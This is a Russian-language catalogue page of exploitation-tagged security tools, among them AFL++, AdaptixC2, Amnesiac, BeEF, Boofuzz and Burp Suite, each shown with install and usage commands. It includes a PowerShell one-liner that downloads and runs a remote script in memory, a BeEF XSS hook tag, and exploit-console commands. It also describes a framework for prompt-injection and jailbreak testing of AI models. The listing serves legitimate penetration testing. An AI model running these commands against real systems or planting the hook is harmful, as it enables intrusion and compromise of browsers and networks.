Каталог инструментов

111 инструментов

Тег: exploitation ×

AFL++

v5.02c
Exploitation

Продвинутый фаззер для поиска уязвимостей в бинарных программах методом покрытия кода. Форк и улучшение AFL: QEMU-режим (без исходников), persistent mode, laf-intel, CmpLog, MOpt мутации, параллельный фаззинг. Один из …

# Ubuntu/Kali: sudo apt install afl++ # Или из исходников (для последних фич): git clone https://github.com/AFLplusplus/AFLplusplus cd AFLplusplus make distrib sudo make install # Компиляция цели с инструментацией: CC=afl-clang-fast ./configure make # Запуск фаззинга: afl-fuzz -i input/ -o output/ -- ./target_binary @@ # QEMU-режим (без исходников): afl-fuzz -i input/ -o output/ -Q -- ./target_binary @@
Exploitation

Фреймворк для автоматизированного тестирования безопасности AI и LLM эндпоинтов, выполняющий задачи от разведки до эксплуатации, включая prompt injection и jailbreak-тестирование.

pip install aix-framework pip install aix-framework[ml]

AdStrike

Exploitation

Модульный терминальный фреймворк, объединяющий рабочие процессы атак на Active Directory — от разведки и операций с Kerberos до отчётности — в рамках единого состояния сессии.

git clone https://github.com/capture0x/AdStrike.git cd AdStrike chmod +x install.sh run.sh bash install.sh source venv/bin/activate bash run.sh

AdaptixC2

v1.2
Exploitation

Расширяемый кроссплатформенный post-exploitation фреймворк с плагинной архитектурой листенеров и агентов, поддержкой шифрованных коммуникаций, совместных сессий операторов и исполнения Beacon Object File.

git clone https://github.com/Adaptix-Framework/AdaptixC2.git cd AdaptixC2 sudo apt install mingw-w64 make gcc g++ g++-mingw-w64 wget https://go.dev/dl/go1.25.4.linux-amd64.tar.gz -O /tmp/go1.25.4.linux-amd64.tar.gz sudo rm -rf /usr/local/go /usr/local/bin/go sudo tar -C /usr/local -xzf /tmp/go1.25.4.linux-amd64.tar.gz sudo ln -s /usr/local/go/bin/go /usr/local/bin/go make server-ext
Exploitation

Python-инструментарий для выполнения плейбуков, сопоставленных с MITRE ATT&CK, для симуляции тактик злоумышленников в контролируемых окружениях, с режимами безопасной симуляции и реального выполнения.

git clone https://github.com/Aviral2642/adversary-emulation-framework.git cd adversary-emulation-framework chmod +x install.sh ./install.sh

Amatsumara

v2.9.1
Exploitation

Фреймворк для пентестинга на Rust с динамической загрузкой модулей через C FFI. Модули — нативные `.so`-библиотеки: добавить новую возможность = скопировать файл в директорию модулей. Содержит 8 exploit-модулей, …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Amatsumara.git cd Amatsumara cargo build --release # Запуск консоли ./target/release/amatsumara-console # Основные команды REPL: # search <term> -- поиск модулей (по имени, типу, CVE) # search cve:CVE-2024-45337 -- поиск по CVE # use exploit/module-slug -- загрузить модуль # set LHOST 192.168.1.100 -- установить опцию (auto-detect tun0/tap0) # set LPORT 4444 # run -- выполнить # run -j -- в фоне (background job) # sessions -- список сессий # sessions -i 1 -- interact с сессией #1 # Экспорт каталога модулей (JSON) ./target/release/amatsumara-console --list-modules --json | jq '.[].slug'

Amnesiac

Exploitation

PowerShell post-exploitation фреймворк, ориентированный на in-memory выполнение для поддержки латерального перемещения и оценки обстановки в средах Active Directory.

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/refs/heads/main/Amnesiac_ShellReady.ps1');Amnesiac

BeEF

v0.6.0.0
Exploitation

Browser Exploitation Framework — фреймворк для атак через XSS-хук на браузер. После внедрения JS-агента: сбор информации, атаки на внутреннюю сеть, социальная инженерия в браузере, эксплуатация расширений. 300+ модулей …

# Kali Linux (предустановлен): sudo beef-xss # Из исходников: git clone https://github.com/beefproject/beef cd beef bundle install sudo ./beef # Интерфейс: http://127.0.0.1:3000/ui/panel # Хук: <script src="http://yourip:3000/hook.js"></script>

Binwalk

v3.1.0
Exploitation

Инструмент для анализа прошивок (firmware): обнаруживает и извлекает встроенные файловые системы, архивы и исполняемый код. Поддерживает рекурсивную распаковку. Широко применяется в hardware hacking, IoT security и CTF.

# Kali Linux / Ubuntu (v2, stable): sudo apt install binwalk # Из исходников (актуальная версия): git clone https://github.com/ReFirmLabs/binwalk cd binwalk pip3 install . binwalk firmware.bin # анализ binwalk -e firmware.bin # извлечение binwalk -Me firmware.bin # рекурсивная распаковка binwalk -A firmware.bin # поиск CPU-архитектур

Boofuzz

v0.4.2
Exploitation

Python-фреймворк для сетевого фаззинга — преемник Sulley. Фаззинг произвольных сетевых протоколов: TCP, UDP, SSH, FTP, HTTP, промышленные протоколы (Modbus, DNP3) и другие. Поддерживает мониторинг краша, web-интерфейс для отслеживания …

pip3 install boofuzz # Из исходников: git clone https://github.com/jtpereyda/boofuzz cd boofuzz pip3 install . # Минимальный пример фаззинга HTTP: from boofuzz import * session = Session(target=Target(connection=TCPSocketConnection("127.0.0.1", 80))) s_initialize("HTTP GET") s_string("GET") s_delim(" ") s_string("/") s_static(" HTTP/1.1\r\n\r\n") session.connect(s_get("HTTP GET")) session.fuzz()

Burp Suite

Exploitation ★ featured

Профессиональная платформа для тестирования безопасности веб-приложений. Proxy для перехвата трафика, Scanner, Intruder (фаззинг/брутфорс), Repeater, Decoder, Sequencer, Collaborator. Community Edition — бесплатна и покрывает большинство задач. Professional ($449/год) добавляет …

# Скачать JAR / установщик с официального сайта # https://portswigger.net/burp/communitydownload # Kali Linux (предустановлен) burpsuite # Запуск из JAR java -jar burpsuite_community_vX.X.X.jar
Exploitation

Фреймворк для AI-безопасности (Cybersecurity AI) — платформа для построения AI-агентов, специализирующихся на задачах кибербезопасности: пентестинг, поиск уязвимостей, автоматизация red-team операций. Архивирован автором, но сохраняет высокую историческую ценность и …

python3.12 -m venv cai_env source cai_env/bin/activate pip install cai-framework export CAI_LICENSE_OFF=1 cai